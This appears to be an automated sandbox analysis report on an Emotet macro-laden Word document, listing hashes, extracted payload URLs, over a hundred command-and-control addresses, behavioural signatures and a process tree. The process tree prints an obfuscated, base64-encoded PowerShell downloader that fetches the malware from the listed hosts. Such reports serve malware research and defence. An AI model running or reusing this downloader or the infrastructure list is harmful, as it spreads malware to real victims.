Analysis
-
max time kernel
85s -
max time network
86s -
platform
windows7_x64 -
resource
win7 -
submitted
27-10-2020 23:16
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc
Resource
win7
General
-
Target
emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc
-
Size
191KB
-
MD5
5380ac7e6bb601430d526324efcb3be1
-
SHA1
3a2e6649282590cf90ad5438966c96d412ac11ec
-
SHA256
6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495
-
SHA512
246ccb0a5b1abc6a248d4e34affeb0607d4df20f6d39a16a498da56d4125fbd778be4a2b4e6b02f0f4b3f1d494101a2c5edc227cdd969a88cca0efaf1591ffe2
Malware Config
Extracted
http://mueindustries.com/wp-admin/D/
http://biharbhumibazar.com/wp-admin/D/
http://jiehost.com/wp-admin/6ZFh6A/
http://fit.develab.mx/wp-admin/sjai4FA/
http://weeklyoutfits.com/how-much/zw2z/
http://personalizedjigsaws.com/replace_img/qG6D9T/
http://stabri-thailand.org/cgi-bin/1GKI/
http://odmova.pl/retranslate/OqLdry/
Extracted
emotet
Epoch2
88.153.35.32:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
67.170.250.203:443
121.124.124.40:7080
103.86.49.11:8080
74.214.230.200:80
194.187.133.160:443
172.104.97.173:8080
172.91.208.86:80
200.116.145.225:443
202.134.4.216:8080
172.105.13.66:443
190.164.104.62:80
50.35.17.13:80
176.111.60.55:8080
201.241.127.190:80
66.76.12.94:8080
95.213.236.64:8080
194.4.58.192:7080
62.171.142.179:8080
79.137.83.50:443
190.108.228.27:443
120.150.218.241:443
218.147.193.146:80
176.113.52.6:443
24.178.90.49:80
123.176.25.234:80
138.68.87.218:443
194.190.67.75:80
203.153.216.189:7080
102.182.93.220:80
37.139.21.175:8080
50.91.114.38:80
154.91.33.137:443
97.82.79.83:80
75.143.247.51:80
71.15.245.148:8080
89.121.205.18:80
209.54.13.14:80
47.36.140.164:80
27.114.9.93:80
104.131.11.150:443
24.133.106.23:80
49.50.209.131:80
174.106.122.139:80
2.58.16.89:8080
157.245.99.39:8080
137.59.187.107:8080
220.245.198.194:80
61.33.119.226:443
190.29.166.0:80
62.75.141.82:80
112.185.64.233:80
61.19.246.238:443
186.70.56.94:443
37.187.72.193:8080
190.240.194.77:443
108.46.29.236:80
118.83.154.64:443
121.7.31.214:80
216.139.123.119:80
91.146.156.228:80
119.59.116.21:8080
89.216.122.92:80
190.162.215.233:80
87.106.136.232:8080
68.115.186.26:80
62.30.7.67:443
37.179.204.33:80
110.145.77.103:80
78.24.219.147:8080
185.94.252.104:443
24.230.141.169:80
49.3.224.99:8080
104.131.123.136:443
74.208.45.104:8080
115.94.207.99:443
124.41.215.226:80
142.112.10.95:20
41.185.28.84:8080
139.99.158.11:443
113.61.66.94:80
67.163.161.107:80
172.86.188.251:8080
110.142.236.207:80
120.150.60.189:80
87.106.139.101:8080
61.76.222.210:80
93.147.212.206:80
50.245.107.73:443
85.105.111.166:80
94.230.70.6:80
134.209.144.106:443
202.141.243.254:443
94.23.237.171:443
209.141.54.221:7080
187.161.206.24:80
76.175.162.101:80
168.235.67.138:7080
24.137.76.62:80
95.9.5.93:80
123.142.37.166:80
72.186.136.247:443
182.208.30.18:443
186.74.215.34:80
162.241.140.129:8080
217.20.166.178:7080
184.180.181.202:80
217.123.207.149:80
202.134.4.211:8080
72.143.73.234:443
59.125.219.109:443
24.179.13.119:80
5.39.91.110:7080
109.74.5.95:8080
46.105.131.79:8080
91.211.88.52:7080
94.200.114.161:80
173.63.222.65:80
139.162.60.124:8080
188.219.31.12:80
139.59.60.244:8080
190.12.119.180:443
78.188.106.53:443
96.245.227.43:80
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1668 2028 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/856-12-0x0000000001FB0000-0x0000000001FE3000-memory.dmp emotet behavioral1/memory/856-13-0x0000000001FF0000-0x0000000002021000-memory.dmp emotet behavioral1/memory/1116-17-0x0000000000580000-0x00000000005B3000-memory.dmp emotet behavioral1/memory/1116-18-0x0000000001E20000-0x0000000001E51000-memory.dmp emotet -
Blacklisted process makes network request 1 IoCs
Processes:
POwersheLL.exeflow pid process 7 1668 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
Ekkzsyr.exebatmeter.exepid process 856 Ekkzsyr.exe 1116 batmeter.exe -
Drops file in System32 directory 2 IoCs
Processes:
POwersheLL.exeEkkzsyr.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe File opened for modification C:\Windows\SysWOW64\tbs\batmeter.exe Ekkzsyr.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A797F7EE-7BAB-4855-894C-9FA2B5CABF5F}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\TypeLib\{A797F7EE-7BAB-4855-894C-9FA2B5CABF5F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A797F7EE-7BAB-4855-894C-9FA2B5CABF5F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1036 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
POwersheLL.exebatmeter.exepid process 1668 POwersheLL.exe 1668 POwersheLL.exe 1116 batmeter.exe 1116 batmeter.exe 1116 batmeter.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 1668 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEEkkzsyr.exebatmeter.exepid process 1036 WINWORD.EXE 1036 WINWORD.EXE 856 Ekkzsyr.exe 1116 batmeter.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
Ekkzsyr.exedescription pid process target process PID 856 wrote to memory of 1116 856 Ekkzsyr.exe batmeter.exe PID 856 wrote to memory of 1116 856 Ekkzsyr.exe batmeter.exe PID 856 wrote to memory of 1116 856 Ekkzsyr.exe batmeter.exe PID 856 wrote to memory of 1116 856 Ekkzsyr.exe batmeter.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQAnACwAJwBlACcALAAnAG0ALgBJAE8ALgBkACcALAAnAGkAJwApACAAIAApACAAOwAgACAAIABTAGUAdAAtAEkAVABFAG0AIAAgAFYAQQBSAGkAQQBCAEwAZQA6AEMAZgBMACAAKAAgAFsAVAB5AHAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADgAfQB7ADcAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADMAfQB7ADAAfQAiAC0ARgAgACcAUgAnACwAJwBuAHQAbQAnACwAJwBzACcALAAnAGEATgBhAGcAZQAnACwAJwBFACcALAAnAFkAcwB0AEUATQAuAE4ARQBUACcALAAnAHAAbwBJACcALAAnAEkAYwAnACwAJwAuAFMAZQBSAHYAJwApACkAOwAgACAAJABYAGoAeQBwAHUAbQAzAD0AKAAnAE4AJwArACgAJwAyAGQAaABzACcAKwAnAGEAJwApACsAJwB3ACcAKQA7ACQAUwBsAGYAMAA3AHQAZgA9ACQARwBnADYANQBoAHAAZwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgA5ADgAdABqAGIAdQA7ACQARQBuAGIAeAA2ADEAdwA9ACgAJwBTAG4AJwArACgAJwA1ADMAJwArACcANQA3ADMAJwApACkAOwAgACgAIAAgAEcAZQBUAC0AQwBoAEkATABEAGkAVABFAE0AIAB2AEEAUgBpAGEAYgBMAGUAOgBYADgAWQBFAGkAcwAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBDAFIAZQBBAGAAVABlAGQASQByAGUAYwBgAFQAYABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcABQAHgAJwArACcAVABzADAAbgBzADgAJwApACsAJwBjACcAKwAoACcAcAAnACsAJwBQAHgAUQAnACkAKwAoACcANgBzACcAKwAnADQAYgAnACkAKwAoACcAYgBmAHAAJwArACcAUAB4ACcAKQApAC4AIgByAGUAcABgAGwAYQBgAEMARQAiACgAKABbAEMAaABBAHIAXQAxADEAMgArAFsAQwBoAEEAcgBdADgAMAArAFsAQwBoAEEAcgBdADEAMgAwACkALAAnAFwAJwApACkAKQA7ACQARgB2AHQANwBoAG0AdgA9ACgAJwBCACcAKwAoACcAdgBoACcAKwAnAHcAcQBqACcAKQArACcAbAAnACkAOwAgACQAYwBGAGwAOgA6ACIAUwBgAGUAYABDAGAAVQBgAFIAaQB0AHkAUAByAG8AVABgAE8AQwBvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEYAcABiAGUAMABfAGMAPQAoACcATwBxACcAKwAoACcAZAA1ACcAKwAnAHYAcAAnACkAKwAnAGsAJwApADsAJABMAG8AbQB3AGwAZgA0ACAAPQAgACgAJwBFACcAKwAnAGsAJwArACgAJwBrAHoAcwAnACsAJwB5AHIAJwApACkAOwAkAFUAdgB1AGsAcwBfAF8APQAoACgAJwBCAG0AdQAnACsAJwBvACcAKQArACcANQB4ACcAKwAnAHkAJwApADsAJABOAGEAbAAyAGkAMwA3AD0AKAAnAEgANgAnACsAJwBxAGYAJwArACgAJwAwAHgAJwArACcAXwAnACkAKQA7ACQASQBuAG0ANAB0AHgAMAA9ACQASABPAE0ARQArACgAKAAnAFQAJwArACgAJwA3AFAAVABzACcAKwAnADAAbgAnACsAJwBzADgAYwAnACkAKwAnAFQAJwArACgAJwA3ACcAKwAnAFAAUQAnACsAJwA2AHMANAAnACkAKwAoACcAYgAnACsAJwBiAGYAVAAnACkAKwAnADcAUAAnACkAIAAtAEMAcgBFAHAAbABhAEMARQAgACgAJwBUACcAKwAnADcAUAAnACkALABbAEMAaABhAHIAXQA5ADIAKQArACQATABvAG0AdwBsAGYANAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFkAaABuAG8AcQAzAGEAPQAoACcATQAnACsAJwB4ADMAJwArACgAJwBqACcAKwAnADYANwB0ACcAKQApADsAJABYAHgAdwBrADIANgB6AD0ALgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMATABpAEUATgB0ADsAJABYAHYAbQA5AGcAbwB5AD0AKAAoACcAaAB0AHQAcAAnACsAJwA6AFsAJwArACcAIAB1AE4ASABzACAAXQBbACAAJwArACcAdQBOAEgAcwAgAF0AbQAnACkAKwAoACcAdQBlAGkAJwArACcAbgBkACcAKQArACgAJwB1AHMAJwArACcAdAByACcAKwAnAGkAZQBzAC4AJwArACcAYwBvAG0AWwAnACsAJwAgAHUATgBIACcAKQArACgAJwBzACcAKwAnACAAXQB3AHAALQAnACkAKwAoACcAYQBkAG0AaQAnACsAJwBuAFsAIAAnACsAJwB1ACcAKQArACcATgAnACsAKAAnAEgAcwAgACcAKwAnAF0ARAAnACkAKwAoACcAWwAgACcAKwAnAHUATgBIAHMAJwApACsAKAAnACAAXQBAAGgAdAAnACsAJwB0ACcAKwAnAHAAJwApACsAKAAnADoAJwArACcAWwAgACcAKQArACgAJwB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AWwAnACkAKwAnACAAJwArACcAdQBOACcAKwAnAEgAcwAnACsAJwAgACcAKwAoACcAXQBiAGkAJwArACcAaAAnACkAKwAoACcAYQByACcAKwAnAGIAaAB1ACcAKwAnAG0AJwApACsAKAAnAGkAYgBhAHoAJwArACcAYQByAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAJwBbACAAJwArACcAdQAnACkAKwAoACcATgAnACsAJwBIAHMAIAAnACsAJwBdAHcAcAAtACcAKwAnAGEAZABtAGkAJwApACsAJwBuAFsAJwArACgAJwAgACcAKwAnAHUATgBIAHMAIABdACcAKwAnAEQAWwAnACkAKwAoACcAIAB1ACcAKwAnAE4ASAAnACsAJwBzACAAXQAnACkAKwAoACcAQABoACcAKwAnAHQAdABwACcAKwAnADoAWwAnACkAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQAnACsAJwBbACcAKwAnACAAdQBOACcAKQArACgAJwBIAHMAIABdACcAKwAnAGoAaQAnACsAJwBlACcAKQArACgAJwBoACcAKwAnAG8AcwAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtAFsAIAB1AE4AJwApACsAKAAnAEgAcwAgACcAKwAnAF0AJwApACsAKAAnAHcAcAAtAGEAJwArACcAZABtAGkAbgBbACcAKwAnACAAdQBOACcAKwAnAEgAJwApACsAKAAnAHMAIABdADYAJwArACcAWgBGAGgANgAnACsAJwBBAFsAJwApACsAKAAnACAAdQBOAEgAJwArACcAcwAgACcAKwAnAF0AJwApACsAKAAnAEAAaAAnACsAJwB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgBbACAAJwApACsAKAAnAHUAJwArACcATgBIAHMAJwArACcAIABdAFsAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAJwArACcAcwAgAF0AZgBpAHQAJwApACsAKAAnAC4AZAAnACsAJwBlAHYAJwApACsAKAAnAGUAbABhACcAKwAnAGIAJwApACsAKAAnAC4AJwArACcAbQAnACsAJwB4AFsAIAAnACsAJwB1AE4ASABzACAAXQB3AHAALQBhACcAKwAnAGQAJwApACsAJwBtACcAKwAnAGkAbgAnACsAJwBbACcAKwAoACcAIAB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AJwApACsAKAAnAHMAJwArACcAagBhACcAKQArACgAJwBpADQARgBBAFsAJwArACcAIAB1AE4AJwArACcASAAnACsAJwBzACAAXQAnACkAKwAnAEAAaAAnACsAKAAnAHQAdABwADoAWwAgAHUATgAnACsAJwBIACcAKQArACgAJwBzACAAXQAnACsAJwBbACAAJwArACcAdQBOACcAKQArACgAJwBIAHMAJwArACcAIABdACcAKwAnAHcAZQBlAGsAbAB5ACcAKQArACcAbwB1ACcAKwAoACcAdABmACcAKwAnAGkAdAAnACkAKwAoACcAcw